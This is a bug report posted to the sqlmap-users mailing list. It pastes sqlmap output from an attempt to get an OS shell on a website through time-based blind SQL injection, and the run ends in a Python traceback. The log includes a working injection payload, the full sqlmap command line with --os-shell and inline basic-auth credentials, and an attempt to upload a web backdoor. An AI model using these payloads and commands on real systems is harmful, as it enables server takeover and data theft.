I tryed to upload the webbackdoor with no Knowledge of the webserver document root. The result is a Bug.
[18:52:39] [INFO] heuristics detected web page charset 'ascii' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: n Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: n=-5351' OR 1181=SLEEP(5) AND 'DBAH'='DBAH&vurl=http://website.com/content/video16/ 001Ccmg.avi&cmd=altern --- [18:52:39] [INFO] the back-end DBMS is MySQL web server operating system: Linux Fedora 5 (Bordeaux) web application technology: Apache 2.2.0, PHP 5.1.6 back-end DBMS: MySQL 5 [18:52:39] [INFO] going to use a web backdoor for command prompt [18:52:39] [INFO] fingerprinting the back-end DBMS operating system [18:52:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [18:52:47] [INFO] the back-end DBMS operating system is Linux [18:52:47] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > 3 [18:52:53] [WARNING] unable to retrieve the web server document root please provide the web server document root [/var/www/]: [18:55:06] [INFO] retrieved web server full paths: '/members/video.php' please provide any additional web server full path to try to upload the agent [Enter for None]: [18:55:15] [WARNING] HTTP error codes detected during testing: 403 (Forbidden) - 1 times [18:55:15] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4198), retry your run with the latest developmen t version from the Subversion repository. If the exception persists, please send by e-mail to sqlmap-users@lis ts.sourceforge.net the following text and any information required to reproduce the bug. The developers will t ry to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev (r4198) Python version: 2.7.1 Operating system: nt Command line: C:\pentest\p\sqlmap.0.9-1\sqlmap.py -u http://website.com/members/video.php?n=769&vurl= ************************************************************************************************************** ************************************************************************************************************** ************************************************************************************************************** ************************************************************************************************************** *************************************************************************************************** --auth-type=basic --auth-cred=mstier07:mstier --random-agent --retries=6 --level 5 --risk 3 --os-shell Technique: TIME Back-end DBMS: MySQL (fingerprinted) Traceback (most recent call last): File "C:\pentest\p\sqlmap.0.9-1\sqlmap.py", line 86, in main start() File "C:\pentest\p\sqlmap.0.9-1\lib\controller\controller.py", line 551, in start action() File "C:\pentest\p\sqlmap.0.9-1\lib\controller\action.py", line 139, in action conf.dbmsHandler.osShell() File "C:\pentest\p\sqlmap.0.9-1\plugins\generic\takeover.py", line 81, in osShell self.initEnv(web=web) File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\abstraction.py", line 151, in initEnv self.webInit() File "C:\pentest\p\sqlmap.0.9-1\lib\takeover\web.py", line 240, in webInit uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 278, in getPage conn = urllib2.urlopen(req) File "C:\Python27\lib\urllib2.py", line 126, in urlopen return _opener.open(url, data, timeout) File "C:\Python27\lib\urllib2.py", line 392, in open response = self._open(req, data) File "C:\Python27\lib\urllib2.py", line 410, in _open '_open', req) File "C:\Python27\lib\urllib2.py", line 370, in _call_chain result = func(*args) File "C:\Python27\lib\urllib2.py", line 1186, in http_open return self.do_open(httplib.HTTPConnection, req) File "C:\Python27\lib\urllib2.py", line 1127, in do_open h = http_class(host, timeout=req.timeout) # will parse host:port File "C:\Python27\lib\httplib.py", line 681, in __init__ self._set_hostport(host, port) File "C:\Python27\lib\httplib.py", line 706, in _set_hostport raise InvalidURL("nonnumeric port: '%s'" % host[i+1:]) InvalidURL: nonnumeric port: '80\' [*] shutting down at 18:55:15 ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
